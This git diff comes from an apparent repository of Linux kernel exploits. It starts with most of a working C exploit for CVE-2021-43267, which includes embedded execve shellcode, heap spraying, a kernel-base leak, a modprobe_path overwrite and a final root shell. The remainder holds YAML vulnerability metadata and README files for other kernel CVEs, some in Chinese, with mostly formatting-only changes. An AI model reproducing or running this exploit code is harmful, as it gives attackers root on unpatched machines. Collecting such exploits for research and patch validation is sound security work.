0x3e, + 0x00, 0x01, 0x00, 0x00, 0x00, 0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, + 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, + 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, + 0x00, 0x00, 0x00, 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, + 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x69, + 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x31, 0xff, 0x48, 0xc7, 0xc0, 0x6a, + 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0x8d, 0x3d, 0x1b, 0x00, 0x00, 0x00, + 0x6a, 0x00, 0x48, 0x89, 0xe2, 0x57, 0x48, 0x89, 0xe6, 0x48, 0xc7, 0xc0, + 0x3b, 0x00, 0x00, 0x00, 0x0f, 0x05, 0x48, 0xc7, 0xc0, 0x3c, 0x00, 0x00, + 0x00, 0x0f, 0x05, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00 + }; + + FILE *fp; + + fp = fopen("/tmp/benign", "wb"); + if (fp == NULL) { + perror("fopen"); + return -1; + } + + if (fwrite("\xff\xff\xff\xff", 4, 1, fp) < 1) { + perror("fwrite"); + return -1; + } + fclose(fp); + + fp = fopen("/tmp/hax", "wb"); + if (fp == NULL) { + perror("fopen"); + return -1; + } + + if (fwrite(elfcode, sizeof(elfcode), 1, fp) < 1) { + perror("fwrite"); + return -1; + } + fclose(fp); + + if (chmod("/tmp/benign", 0777) < 0) { + perror("chmod"); + return -1; + } + + if (chmod("/tmp/hax", 0777) < 0) { + perror("chmod"); + return -1; + } + + return 0; +} + +int main(int argc, char *argv[]) { + uint64_t pty_ops = 0; + uint64_t mybuf = 0; + uint64_t kernel_base = 0; + + uint8_t fake_tty[0x20]; + uint8_t peekbuf[0x2000]; + + int peek_cnt = 1; + int seqno=0; + + int tty_fds[SPRAY_TTY_CNT]; + int queue_id[MSG_COUNT]; + int queue_id_final = 0; + + struct message_t dummy; + dummy.type = MTYPE; + memset(dummy.body, 0x58, BODY_SIZE); + + 
fprintf(stdout, + "\n" + " $$$ Linux 5.10-5.15 CVE-2021-43267 exploit $$$\n" + " -- by blasty --\n\n" + ); + + if (argc != 2) { + usage(argv[0]); + return -1; + } + + info("enabling tipc udp media"); + if (netlink_enable_tipc_udp(argv[1]) < 0) { + fatal("failed to enable tipc udp media"); + } + + info("establish tipc link"); + if (tipc_link_setup(argv[1]) < 0) { + fatal("failed to establish tipc link"); + } + + info("installing helpers"); + if (setup_modprobe_hax() < 0) { + fatal("failed to setup helpers"); + } + + info("create messages queues"); + if ((queue_id_final = msgget(IPC_PRIVATE, IPC_CREAT | 0666)) < 0) { + perror("msgget"); + fatal("failed to create message queue"); + } + + for(int i = 0; i < MSG_COUNT; i++) { + if ((queue_id[i] = msgget(IPC_PRIVATE, IPC_CREAT | 0666)) < 0) { + perror("msgget"); + fatal("failed to create message queue %d", i); + } + } + + info("spray messages"); + for(int i = 0; i < MSG_COUNT; i++) { + if (msgsnd(queue_id[i], (void*)&dummy, BODY_SIZE, 0) < 0) { + perror("msgsnd"); + fatal("failed to create message in queue %d", i); + } + } + + info("poking holes"); + for(int i = 0; i < MSG_COUNT; i += 2) { + if(msgrcv(queue_id[i], (void*)&dummy, BODY_SIZE, MTYPE, 0) < 0) { + perror("msgrcv"); + fatal("failed to peek message in queue %d", i); + } + } + + info("tipc bug trigger"); + + uint64_t hacked_msg[4]={ + 0, // m_list.prev + 0, // m_list.next + MTYPE, // m_type + 0x2000, // m_ts + }; + + tipc_trigger((uint8_t*)hacked_msg, 0x20, ++seqno); + + info("spraying tty_struct\n"); + for(int i = 0; i < SPRAY_TTY_CNT; i++) { + if ((tty_fds[i] = open("/dev/ptmx", O_RDWR|O_NOCTTY)) < 0) { + fatal("failed to spray tty_struct %d/%d", i, MSG_COUNT); + } + } + + for(int i = MSG_COUNT-1; i > 0; i--, peek_cnt++) { + int r = msgrcv( + queue_id[i], (void*)peekbuf, 0x2000, 0, MSG_COPY | IPC_NOWAIT + ); + + if (r < 0 || r == BODY_SIZE) { + continue; + } + + info("we corrupted a msg_msg size field! 
(took %d peeks)\n", peek_cnt); + + for(int j = 0; j < r; j += 4) { + if (*(uint32_t*)(peekbuf + j) != TTY_MAGIC) { + continue; + } + + info("found tty_struct at offset 0x%x", j); + pty_ops = read64(peekbuf + j + 0x18); + mybuf = read64(peekbuf + j + 0x40) - 0x408; + + info_value64("pty_ops", pty_ops); + info_value64("our buffer", mybuf); + + memcpy(fake_tty, peekbuf + j, 0x20); + write64(fake_tty + 0x18, mybuf + NEXT_OFFSET); + + // did we hit a master of slave ops ptr? + switch(pty_ops & 0xfff) { + case PTM_UNIX98_OPS & 0xfff: + kernel_base = pty_ops - PTM_UNIX98_OPS; + break; + + case PTS_UNIX98_OPS & 0xfff: + kernel_base = pty_ops - PTS_UNIX98_OPS; + break; + + default: + fatal("this should never happen tbh"); + break; + } + + info_value64("kernel base", kernel_base); + break; + } + + if (pty_ops != 0) { + break; + } else { + info("too bad, tty_struct didnt follow corrupted msg_msg."); + } + } + + if (pty_ops == 0) { + for(int i =0; i < SPRAY_TTY_CNT; i++) { + close(tty_fds[i]); + } + + fatal("infoleak failed. 
try again?"); + } + + info_value64("modprobe_path", kernel_base + MODPROBE_PATH); + + dummy.type = MTYPE; + for(int i = 0; i < BODY_SIZE; i+=8) { + write64(dummy.body + i, kernel_base + GADGET_RET); + } + write64(dummy.body + 0x60, kernel_base + GADGET_WRITE32); + + info("spray fake pty ops vtable"); + for(int i = 0; i < MSG_COUNT; i++) { + for(int j = 0; j < 8; j++) { + if (msgsnd(queue_id[i], (void*)&dummy, BODY_SIZE, 0) < 0) { + perror("msgsnd"); + fatal("failed to create message %d", i); + } + } + } + + int hacked = 0; + + dummy.type = MTYPE; + for(int try = 0; try < TRIES_MAX; try++) { + info("attempting to corrupt tty_struct (try %d)", try); + + if (msgsnd(queue_id_final, (void*)&dummy, BODY_SIZE, 0) < 0) { + perror("msgsnd"); + fatal("failed to create message"); + } + + if ((tty_fds[0] = open("/dev/ptmx", O_RDWR|O_NOCTTY)) < 0) { + fatal("failed to alloc tty_struct"); + } + + if(msgrcv(queue_id_final, (void*)&dummy, BODY_SIZE, MTYPE, 0) < 0) { + perror("msgrcv"); + fatal("failed to receive message"); + } + + tipc_trigger(fake_tty, 0x20, ++seqno); + + int r = 0; + r = ioctl(tty_fds[0], 0x706d742f, kernel_base + MODPROBE_PATH); + if (r == 0) { + info("maybe I have some good news.."); + r = ioctl(tty_fds[0], 0x7861682f, kernel_base + MODPROBE_PATH + 4); + hacked = 1; + break; + } else { + close(tty_fds[0]); + } + } + + if (!hacked) { + fatal("hacking computer failed."); + } + + info("triggering modprobe\n"); + system("/tmp/benign"); + sleep(1); + + info("popping shell\n"); + system("/tmp/sh"); + + for(int j = 0; j < SPRAY_TTY_CNT; j++) { + close(tty_fds[j]); + } + + return 0; } \ No newline at end of file diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-4154.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-4154.yaml index 15bc9b53..18d4c2ae 100644 --- a/cve/linux-kernel/2021/yaml/CVE-2021-4154.yaml +++ b/cve/linux-kernel/2021/yaml/CVE-2021-4154.yaml 
@@ -1,20 +1,20 @@
-id: CVE-2021-4154
-source: https://github.com/Markakd/CVE-2021-4154
-info:
- name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
- severity: high
- description: |
- A use-after-free flaw was found in cgroup1_parse_param in kernel/cgroup/cgroup-v1.c in the Linux kernel's cgroup v1 parser. A local attacker with a user privilege could cause a privilege escalation by exploiting the fsconfig syscall parameter leading to a container breakout and a denial of service on the system.
- scope-of-influence:
- Linux Kernel versions prior to 5.14 rc2
- reference:
- - https://bugzilla.redhat.com/show_bug.cgi?id=2034514
- - https://cloud.google.com/anthos/clusters/docs/security-bulletins#gcp-2022-002
- - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id...
- - https://security.netapp.com/advisory/ntap-20220225-0004/
- classification:
- cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
- cvss-score: 8.8
- cve-id: CVE-2021-4154
- cwe-id: CWE-416
+id: CVE-2021-4154
+source: https://github.com/Markakd/CVE-2021-4154
+info:
+ name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
+ severity: high
+ description: |
+ A use-after-free flaw was found in cgroup1_parse_param in kernel/cgroup/cgroup-v1.c in the Linux kernel's cgroup v1 parser. A local attacker with a user privilege could cause a privilege escalation by exploiting the fsconfig syscall parameter leading to a container breakout and a denial of service on the system.
+ scope-of-influence:
+ Linux Kernel versions prior to 5.14 rc2
+ reference:
+ - https://bugzilla.redhat.com/show_bug.cgi?id=2034514
+ - https://cloud.google.com/anthos/clusters/docs/security-bulletins#gcp-2022-002
+ - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id...
+ - https://security.netapp.com/advisory/ntap-20220225-0004/
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2021-4154
+ cwe-id: CWE-416
 tags: cve2021, 内存错误引用
\ No newline at end of file
diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-42008.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-42008.yaml
index e34d9dd1..d906d816 100644
--- a/cve/linux-kernel/2021/yaml/CVE-2021-42008.yaml
+++ b/cve/linux-kernel/2021/yaml/CVE-2021-42008.yaml
@@ -1,21 +1,21 @@
-id: CVE-2021-42008
-source: https://github.com/bsauce/kernel-exploit-factory/tree/main/CVE-2021-42008
-info:
- name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
- severity: high
- description: |
- The decode_data function in drivers/net/hamradio/6pack.c in the Linux kernel before 5.13.13 has a slab out-of-bounds write. Input from a process that has the CAP_NET_ADMIN capability can lead to root access
- scope-of-influence:
- Linux 2.1.94~v5.13.12
- reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2021-42008
- - https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.13.13
- - https://www.youtube.com/watch?v=d5f9xLK8Vhw
- classification:
- cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 7.8
- cve-id: CVE-2021-42008
- cwe-id: CWE-787
- cnvd-id:
- kve-id:
+id: CVE-2021-42008
+source: https://github.com/bsauce/kernel-exploit-factory/tree/main/CVE-2021-42008
+info:
+ name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
+ severity: high
+ description: |
+ The decode_data function in drivers/net/hamradio/6pack.c in the Linux kernel before 5.13.13 has a slab out-of-bounds write. Input from a process that has the CAP_NET_ADMIN capability can lead to root access
+ scope-of-influence:
+ Linux 2.1.94~v5.13.12
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-42008
+ - https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.13.13
+ - https://www.youtube.com/watch?v=d5f9xLK8Vhw
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 7.8
+ cve-id: CVE-2021-42008
+ cwe-id: CWE-787
+ cnvd-id:
+ kve-id:
 tags: 协议解码溢出
\ No newline at end of file
diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-42327.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-42327.yaml
index 883f6652..5beb14e6 100644
--- a/cve/linux-kernel/2021/yaml/CVE-2021-42327.yaml
+++ b/cve/linux-kernel/2021/yaml/CVE-2021-42327.yaml
@@ -1,23 +1,23 @@
-id: CVE-2021-42327
-source: https://github.com/docfate111/CVE-2021-42327
-info:
- name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
- severity: medium
- description: |
- Linux内核5.14.14版本之前的驱动程序/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_debugfs.c 中的dp_link_settings_write允许攻击者基于堆的缓冲区溢出,攻击者可以将字符串写入 AMD GPU 显示驱动程序调试文件系统。当它使用 copy_from_user 的大小将用户空间缓冲区复制到 40 字节堆缓冲区时,不会检查 parse_write_buffer_into_params 内的大小。
-
- scope-of-influence:
- Linux kernel before 5.14.14
-
- reference:
- - https://nvd.nist.gov/vuln/detail/cve-2021-42327
-
- classification:
- cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 6.7
- cve-id: CVE-2021-42327
- cwe-id: CWE-787
- cnvd-id: None
- kve-id: None
-
+id: CVE-2021-42327
+source: https://github.com/docfate111/CVE-2021-42327
+info:
+ name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
+ severity: medium
+ description: |
+ Linux内核5.14.14版本之前的驱动程序/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_debugfs.c 中的dp_link_settings_write允许攻击者基于堆的缓冲区溢出,攻击者可以将字符串写入 AMD GPU 显示驱动程序调试文件系统。当它使用 copy_from_user 的大小将用户空间缓冲区复制到 40 字节堆缓冲区时,不会检查 parse_write_buffer_into_params 内的大小。
+
+ scope-of-influence:
+ Linux kernel before 5.14.14
+
+ reference:
+ - https://nvd.nist.gov/vuln/detail/cve-2021-42327
+
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 6.7
+ cve-id: CVE-2021-42327
+ cwe-id: CWE-787
+ cnvd-id: None
+ kve-id: None
+
 tags: 缓冲区溢出
\ No newline at end of file
diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-43267.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-43267.yaml
index 38cb0b69..83f564c5 100644
--- a/cve/linux-kernel/2021/yaml/CVE-2021-43267.yaml
+++ b/cve/linux-kernel/2021/yaml/CVE-2021-43267.yaml
@@ -1,22 +1,22 @@
-id: CVE-2021-43267
-source: https://github.com/zzhacked/CVE-2021-43267
-info:
- name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核
- severity: critical
- description:
- 该漏洞是由于Linux内核中的net/tipc/crypto.c存在溢出漏洞, TIPC在2020年9月引入的新用户消息类型“MSG_CRYPTO”, 其标头大小和消息大小都根据实际数据包大小进行验证, 但对于消息的keylen成员MSG_CRYPTO或密钥算法名称本身(TIPC_AEAD_ALG_NAME)的大小没有类似大小的检查, 这就导致恶意攻击者可以在此处构造一个较小的恶意数据包, 然后利用keylen成员属性的任意大小特性写入该位置的边界之外, 从而造成远程代码执行. 由于本地对于内核堆大小的控制更加容易, 因此该漏洞很容易在本地进行利用, 而因为TIPC本身的特性, 恶意攻击者也可以利用该漏洞实施远程攻击, 由于该漏洞利用方式简单, 危害较大.
- scope-of-influence:
- 5.10-rc1 < Linux Kernel < 5.15
- reference:
- - https://www.sentinelone.com/labs/tipc-remote-linux-kernel-heap-overflow-allows-arbitrary-code-execution/
- - https://thehackernews.com/2021/11/critical-rce-vulnerability-reported-in.html
- - https://www.zdnet.com/article/remote-code-execution-flaw-patched-in-linux-kernel-tipc-module/#ftag=RSSbaffb68
- - https://nvd.nist.gov/vuln/detail/CVE-2021-43267
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.8
- cve-id: CVE-2021-43267
- cwe-id: CWE-20
- cnvd-id: None
- kve-id: None
+id: CVE-2021-43267
+source: https://github.com/zzhacked/CVE-2021-43267
+info:
+ name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核
+ severity: critical
+ description:
+ 该漏洞是由于Linux内核中的net/tipc/crypto.c存在溢出漏洞, TIPC在2020年9月引入的新用户消息类型“MSG_CRYPTO”, 其标头大小和消息大小都根据实际数据包大小进行验证, 但对于消息的keylen成员MSG_CRYPTO或密钥算法名称本身(TIPC_AEAD_ALG_NAME)的大小没有类似大小的检查, 这就导致恶意攻击者可以在此处构造一个较小的恶意数据包, 然后利用keylen成员属性的任意大小特性写入该位置的边界之外, 从而造成远程代码执行. 由于本地对于内核堆大小的控制更加容易, 因此该漏洞很容易在本地进行利用, 而因为TIPC本身的特性, 恶意攻击者也可以利用该漏洞实施远程攻击, 由于该漏洞利用方式简单, 危害较大.
+ scope-of-influence:
+ 5.10-rc1 < Linux Kernel < 5.15
+ reference:
+ - https://www.sentinelone.com/labs/tipc-remote-linux-kernel-heap-overflow-allows-arbitrary-code-execution/
+ - https://thehackernews.com/2021/11/critical-rce-vulnerability-reported-in.html
+ - https://www.zdnet.com/article/remote-code-execution-flaw-patched-in-linux-kernel-tipc-module/#ftag=RSSbaffb68
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-43267
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2021-43267
+ cwe-id: CWE-20
+ cnvd-id: None
+ kve-id: None
 tags: 堆溢出漏洞
\ No newline at end of file
diff --git a/cve/linux-kernel/2022/CVE-2022-0185/Makefile b/cve/linux-kernel/2022/CVE-2022-0185/Makefile
index 615313cf..47020636 100644
--- a/cve/linux-kernel/2022/CVE-2022-0185/Makefile
+++ b/cve/linux-kernel/2022/CVE-2022-0185/Makefile
@@ -1,2 +1,2 @@
-all: exploit.c
+all: exploit.c
 gcc exploit.c -o exploit -static -no-pie -s
\ No newline at end of file
diff --git a/cve/linux-kernel/2022/CVE-2022-0185/README.md b/cve/linux-kernel/2022/CVE-2022-0185/README.md
index 90bfd2aa..33aeb800 100644
--- a/cve/linux-kernel/2022/CVE-2022-0185/README.md
+++ b/cve/linux-kernel/2022/CVE-2022-0185/README.md
@@ -1,10 +1,10 @@
-# CVE-2022-0185 pipe version
-
-Using pipe-primitive to exploit CVE-2022-0185, so no kaslr leak nor smap smep ktpi bypass is needed :)
-
-(Q: What is pipe-primitive? A: https://github.com/veritas501/pipe-primitive)
-
-![](assets/it_works.png)
-
-### 漏洞检测程序来源
-- https://github.com/veritas501/CVE-2022-0185-PipeVersion
+# CVE-2022-0185 pipe version
+
+Using pipe-primitive to exploit CVE-2022-0185, so no kaslr leak nor smap smep ktpi bypass is needed :)
+
+(Q: What is pipe-primitive? A: https://github.com/veritas501/pipe-primitive)
+
+![](assets/it_works.png)
+
+### 漏洞检测程序来源
+- https://github.com/veritas501/CVE-2022-0185-PipeVersion
diff --git a/cve/linux-kernel/2022/CVE-2022-0847/compile.sh b/cve/linux-kernel/2022/CVE-2022-0847/compile.sh
old mode 100755
new mode 100644
diff --git a/cve/linux-kernel/2022/CVE-2022-25636/README.md b/cve/linux-kernel/2022/CVE-2022-25636/README.md
index 72351dad..d6ed3ca0 100644
--- a/cve/linux-kernel/2022/CVE-2022-25636/README.md
+++ b/cve/linux-kernel/2022/CVE-2022-25636/README.md
@@ -1,29 +1,29 @@
-
-
-__漏洞概述:__
-
-攻击者可利用该漏洞访问越界内存,从而导致系统崩溃或进行提权。Linux内核中netfilter子组件引起的越界内存访问漏洞,Netfilter是Linux 2.4.x引入的一个子系统,提供了一整套hook函数的管理机制,实现了数据包过滤、NAT等功能。
-
-__环境:__
-
-Linux内核为5.13.0-30。
-
-__注意事项:__
-
-exploit并不是每次都生效(~40%),失败后需重新启动后再exploit。
-
-可利用可能破坏堆上的重要数据,或进行提权。
-
-__原理说明:__
-
-漏洞的发生点位于:
-
-​ linux\net\netfilter\nf_dup_netdev.c : 67 : nft_fwd_dup_netdev_offload
-
-​ 在设置flow->rule->action.entries时没有对堆边界进行检查。
-
-__参考资料:__
-
-代码来自于 https://github.com/Bonfee/CVE-2022-25636
-
+
+
+__漏洞概述:__
+
+攻击者可利用该漏洞访问越界内存,从而导致系统崩溃或进行提权。Linux内核中netfilter子组件引起的越界内存访问漏洞,Netfilter是Linux 2.4.x引入的一个子系统,提供了一整套hook函数的管理机制,实现了数据包过滤、NAT等功能。
+
+__环境:__
+
+Linux内核为5.13.0-30。
+
+__注意事项:__
+
+exploit并不是每次都生效(~40%),失败后需重新启动后再exploit。
+
+可利用可能破坏堆上的重要数据,或进行提权。
+
+__原理说明:__
+
+漏洞的发生点位于:
+
+​ linux\net\netfilter\nf_dup_netdev.c : 67 : nft_fwd_dup_netdev_offload
+
+​ 在设置flow->rule->action.entries时没有对堆边界进行检查。
+
+__参考资料:__
+
+代码来自于 https://github.com/Bonfee/CVE-2022-25636
+
 参考链接:https://www.openwall.com/lists/oss-security/2022/02/21/2
\ No newline at end of file
diff --git a/cve/linux-kernel/2022/CVE-2022-2588/exp_file_credential b/cve/linux-kernel/2022/CVE-2022-2588/exp_file_credential
old mode 100755
new mode 100644
diff --git a/cve/linux-kernel/2022/CVE-2022-27666/README.md b/cve/linux-kernel/2022/CVE-2022-27666/README.md
index 397df2c5..655cf99c 100644
--- a/cve/linux-kernel/2022/CVE-2022-27666/README.md
+++ b/cve/linux-kernel/2022/CVE-2022-27666/README.md
@@ -1,17 +1,17 @@
-**漏洞描述:**
-
-这是针对CVE-2022-27666的漏洞,该漏洞在UbuntuDesktop21.10上实现本地权限升级。本地攻击者可利用该漏洞通过覆盖内核堆对象获得特权。
-
-**影响版本:**
-
-linux kernel 5.17-rc5
-
-**漏洞危害**
-
-漏洞危害: 该漏洞源于net/ipv4/esp4.c 和 net/ipv6/esp6.c 中IPsec ESP 代码存在缓冲区溢出,此缺陷允许具有普通用户权限的本地攻击者覆盖内核堆对象,并可能导致本地权限升级威胁。
-
-**参考资料**
-
-代码来自:https://github.com/plummm/CVE-2022-27666
-
+**漏洞描述:**
+
+这是针对CVE-2022-27666的漏洞,该漏洞在UbuntuDesktop21.10上实现本地权限升级。本地攻击者可利用该漏洞通过覆盖内核堆对象获得特权。
+
+**影响版本:**
+
+linux kernel 5.17-rc5
+
+**漏洞危害**
+
+漏洞危害: 该漏洞源于net/ipv4/esp4.c 和 net/ipv6/esp6.c 中IPsec ESP 代码存在缓冲区溢出,此缺陷允许具有普通用户权限的本地攻击者覆盖内核堆对象,并可能导致本地权限升级威胁。
+
+**参考资料**
+
+代码来自:https://github.com/plummm/CVE-2022-27666
+
 参考链接:https://cdn.kernel.org/pub/linux/kernel/v5.x/ChangeLog-5.16.15
\ No newline at end of file
diff --git a/cve/linux-kernel/2022/CVE-2022-27666/compile.sh b/cve/linux-kernel/2022/CVE-2022-27666/compile.sh
old mode 100755
new mode 100644
diff --git a/cve/linux-kernel/2022/CVE-2022-27666/download_symbol.sh b/cve/linux-kernel/2022/CVE-2022-27666/download_symbol.sh
old mode 100755
new mode 100644
diff --git a/cve/linux-kernel/2022/CVE-2022-27666/run.sh b/cve/linux-kernel/2022/CVE-2022-27666/run.sh
old mode 100755
new mode 100644
diff --git a/cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml b/cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml
index eb773fd6..2c0bf1f0 100644
--- a/cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml
+++ b/cve/linux-kernel/2022/yaml/ CVE-2022-36946.yaml
@@ -1,18 +1,18 @@
-id: CVE-2022-36946
-source: https://github.com/Pwnzer0tt1/CVE-2022-36946
-info:
- name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
- severity: 高危
- description: |
- Linux5.18.14 内核中 net/netfilter/nfnetlink_queue.c 的nfqnl_mangle允许远程攻击者造成拒绝服务 (panic),因为在具有单字节nfta_payload属性的nf_queue判定的情况下,skb_pull可能会遇到负的 skb->len。
- scope-of-influence:
- 5.18.14
- reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2022-36946
- - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=722d94847de29310e8aa03fcbdb41fc92c521756
- - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36946
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
- cvss-score: 7.5
- cve-id: CVE-2022-36946
+id: CVE-2022-36946
+source: https://github.com/Pwnzer0tt1/CVE-2022-36946
+info:
+ name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
+ severity: 高危
+ description: |
+ Linux5.18.14 内核中 net/netfilter/nfnetlink_queue.c 的nfqnl_mangle允许远程攻击者造成拒绝服务 (panic),因为在具有单字节nfta_payload属性的nf_queue判定的情况下,skb_pull可能会遇到负的 skb->len。
+ scope-of-influence:
+ 5.18.14
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-36946
+ - https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=722d94847de29310e8aa03fcbdb41fc92c521756
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36946
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
+ cvss-score: 7.5
+ cve-id: CVE-2022-36946
 tags: 拒绝服务,cve2022
\ No newline at end of file
diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-0435.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-0435.yaml
index 64fbf4c3..cdf3a35d 100644
--- a/cve/linux-kernel/2022/yaml/CVE-2022-0435.yaml
+++ b/cve/linux-kernel/2022/yaml/CVE-2022-0435.yaml
@@ -1,23 +1,23 @@
-id: CVE-2022-0435
-source:
- https://github.com/wlswotmd/CVE-2022-0435
-info:
- name: Linux kernel是Linux操作系统的主要组件, 也是计算机硬件与其进程之间的核心. 它负责两者之间的通信, 还要尽可能高效地管理资源. Linux kernel主要负责内存管理、进程管理、设备驱动程序、系统调用和安全防护四项作用.
- severity: high
- description:
- 在Linux内核的TIPC协议功能中发现了一个堆栈溢出缺陷, 即用户发送带有恶意内容的数据包时, 域成员节点的数量高于允许的64个. 这个缺陷允许远程用户崩溃系统, 如果他们能够访问TIPC网络, 则可能提升其权限.
- scope-of-influence:
- linux_kernel 4, linux_kernel 5, Red Hat Enterprise Linux 8, redhat virtualization 4
- references:
- - https://nvd.nist.gov/vuln/detail/CVE-2022-0435
- - https://bugzilla.redhat.com/show_bug.cgi?id=2048738
- - https://security.netapp.com/advisory/ntap-20220602-0001/
- - https://www.openwall.com/lists/oss-security/2022/02/10/1
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 8.8
- cvi-id: CVE-2022-0435
- cwe-id: CWE-787
- cnvd-id: None
- kve-id: None
+id: CVE-2022-0435
+source:
+ https://github.com/wlswotmd/CVE-2022-0435
+info:
+ name: Linux kernel是Linux操作系统的主要组件, 也是计算机硬件与其进程之间的核心. 它负责两者之间的通信, 还要尽可能高效地管理资源. Linux kernel主要负责内存管理、进程管理、设备驱动程序、系统调用和安全防护四项作用.
+ severity: high
+ description:
+ 在Linux内核的TIPC协议功能中发现了一个堆栈溢出缺陷, 即用户发送带有恶意内容的数据包时, 域成员节点的数量高于允许的64个. 这个缺陷允许远程用户崩溃系统, 如果他们能够访问TIPC网络, 则可能提升其权限.
+ scope-of-influence:
+ linux_kernel 4, linux_kernel 5, Red Hat Enterprise Linux 8, redhat virtualization 4
+ references:
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-0435
+ - https://bugzilla.redhat.com/show_bug.cgi?id=2048738
+ - https://security.netapp.com/advisory/ntap-20220602-0001/
+ - https://www.openwall.com/lists/oss-security/2022/02/10/1
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cvi-id: CVE-2022-0435
+ cwe-id: CWE-787
+ cnvd-id: None
+ kve-id: None
 tags: 提升权限, 堆栈溢出
\ No newline at end of file
diff --git a/cve/linux-kernel/2022/yaml/CVE-2022-2586.yaml b/cve/linux-kernel/2022/yaml/CVE-2022-2586.yaml
index d8579295..aa7b89c2 100644
--- a/cve/linux-kernel/2022/yaml/CVE-2022-2586.yaml
+++ b/cve/linux-kernel/2022/yaml/CVE-2022-2586.yaml 
@@ -1,29 +1,29 @@
-id: CVE-2022-2586
-source: https://github.com/aels/CVE-2022-2586-LPE
-info:
- name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
- severity: medium
- description: |
- Linux nf_tables cross-table存在安全漏洞,该漏洞源于释放后重用,允许本地特权攻击者在删除表时导致释放后重用,可能导致本地特权升级。
- scope-of-influence:
- Red Hat Enterprise Linux 9
- reference:
- - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2586
- - https://www.openwall.com/lists/oss-security/2022/08/09/5
- - https://lore.kernel.org/netfilter-devel/20220809170148.164591-1-cascardo@canonical.com/T/#t
- - https://www.zerodayinitiative.com/advisories/ZDI-22-1118/
- - https://ubuntu.com/security/notices/USN-5557-1
